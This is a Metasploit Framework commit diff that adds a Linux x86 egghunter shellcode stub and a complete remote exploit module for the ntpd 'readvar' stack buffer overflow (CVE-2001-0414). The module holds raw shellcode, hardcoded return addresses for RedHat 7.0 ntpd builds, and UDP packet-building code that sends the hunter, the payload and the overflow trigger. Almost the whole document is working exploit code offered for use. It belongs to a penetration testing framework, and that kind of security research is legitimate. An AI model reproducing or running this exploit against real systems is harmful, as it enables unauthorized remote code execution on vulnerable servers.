Added ntp module, linux egghunter

git-svn-id: file:///home/svn/framework3/trunk@5502 4d416f70-5f16-0410-b530-b9f4589650da

lib/rex/exploitation/egghunter.rb

@@ -43,6 +43,35 @@ class Egghunter
 	
 		end
 	end
+	
+	###
+	#
+	# Linux-based egghunters
+	#
+	###
+	module Linux
+		Alias = "linux"
+
+		module X86
+			Alias = ARCH_X86
+
+			#
+			# The egg hunter stub for linux/x86.
+			#
+			def hunter_stub
+				{
+					'Stub' => 
+						"\xfc\x66\x81\xc9\xff\x0f\x41\x6a\x43\x58\xcd\x80" +
+						"\x3c\xf2\x74\xf1\xb8" +
+						"\x41\x41\x41\x41" +
+						"\x89\xcf\xaf\x75\xec\xaf\x75\xe9\xff\xe7",
+					'EggSize'   => 4,
+					'EggOffset' => 0x11
+				}
+			end
+
+		end
+	end
 
 	###
 	#

modules/exploits/multi/ntp/ntp_overflow.rb

@@ -0,0 +1,103 @@
+##
+# $Id$
+##
+
+##
+# This file is part of the Metasploit Framework and may be subject to
+# redistribution and commercial restrictions. Please see the Metasploit
+# Framework web site for more information on licensing and terms of use.
+# http://metasploit.com/projects/Framework/
+##
+
+require 'msf/core'
+
+module Msf
+
+class Exploits::Multi::Ntp::Ntp_Overflow < Msf::Exploit::Remote
+
+	include Exploit::Remote::Udp
+	include Exploit::Remote::Egghunter
+
+	def initialize(info = {})
+		super(update_info(info,
+			'Name'           => 'NTP daemon readvar Buffer Overflow',
+			'Description'    => %q{
+				This module exploits a stack based buffer overflow in the
+				ntpd and xntpd service. By sending an overly long 'readvar'
+				request it is possible to execute code remotely. As the stack
+				is corrupted, this module uses the Egghunter technique.
+			},
+			'Author'         => 'patrick',
+			'License'        => MSF_LICENSE,
+			'Version'        => '$Revision$',
+			'References'     => 
+				[ 
+						[ 'BID', '2540' ],
+						[ 'OSVDB', '805' ],
+						[ 'CVE', '2001-0414' ],
+						[ 'URL', 'http://www.kb.cert.org/vuls/id/970472' ],
+				],
+			'Payload'        =>
+				{
+					'Space'    => 220,
+					'BadChars' => "\x00\x01\x02\x16,=",
+					'StackAdjustment' => -3500,
+					'PrependEncoder' => Metasm::Shellcode.assemble(Metasm::Ia32.new, "xor eax,eax mov al,27 int 0x80").encode_string, # alarm(0)
+					'Compat'   => 
+					{
+						'ConnectionType' => '-reverse',
+					},
+				},
+			'Platform'       => [ 'linux' ],
+			'Arch'		 => [ ARCH_X86 ],
+			'Targets'        =>
+				[
+						[ 'RedHat Linux 7.0 ntpd 4.0.99j', 		{ 'Ret' => 0xbffffbb0 } ],
+						[ 'RedHat Linux 7.0 ntpd 4.0.99j w/debug', 	{ 'Ret' => 0xbffff980 } ],
+						[ 'RedHat Linux 7.0 ntpd 4.0.99k', 		{ 'Ret' => 0xbffffbb0 } ],
+						#[ 'FreeBSD 4.2-STABLE', 			{ 'Ret' => 0xbfbff8bc } ],
+						[ 'Debugging', 					{ 'Ret' => 0xdeadbeef } ],
+				],
+			'Privileged'     => true,
+			'DisclosureDate' => 'Apr 04 2001',
+			'DefaultTarget' => 0))
+
+			register_options([Opt::RPORT(123)], self.class)
+	end
+
+	def exploit
+
+		hunter  = generate_egghunter
+		egg     = hunter[1]
+
+		connect_udp
+
+		pkt1 = "\x16\x02\x00\x01\x00\x00\x00\x00\x00\x00\x016stratum="
+		pkt2 = "\x16\x02\x00\x02\x00\x00\x00\x00\x00\x00\x00\x00"
+
+		sploit =  pkt1 + make_nops(512 - pkt1.length)
+		sploit[(220 + pkt1.length), 4] = [target['Ret']].pack('V')
+		sploit[(224 + pkt1.length), hunter[0].length] = hunter[0]
+
+		print_status("Trying target #{target.name}...")
+
+		print_status("Sending hunter")
+		udp_sock.put(sploit)
+		sleep(0.5)
+
+		print_status("Sending payload")
+		udp_sock.put(pkt1 + egg + egg + payload.encoded)
+		sleep(0.5)
+
+		print_status("Calling overflow trigger")
+		udp_sock.put(pkt2)
+		sleep(0.5)
+
+		handler
+		disconnect_udp
+
+	end
+
+end
+end
+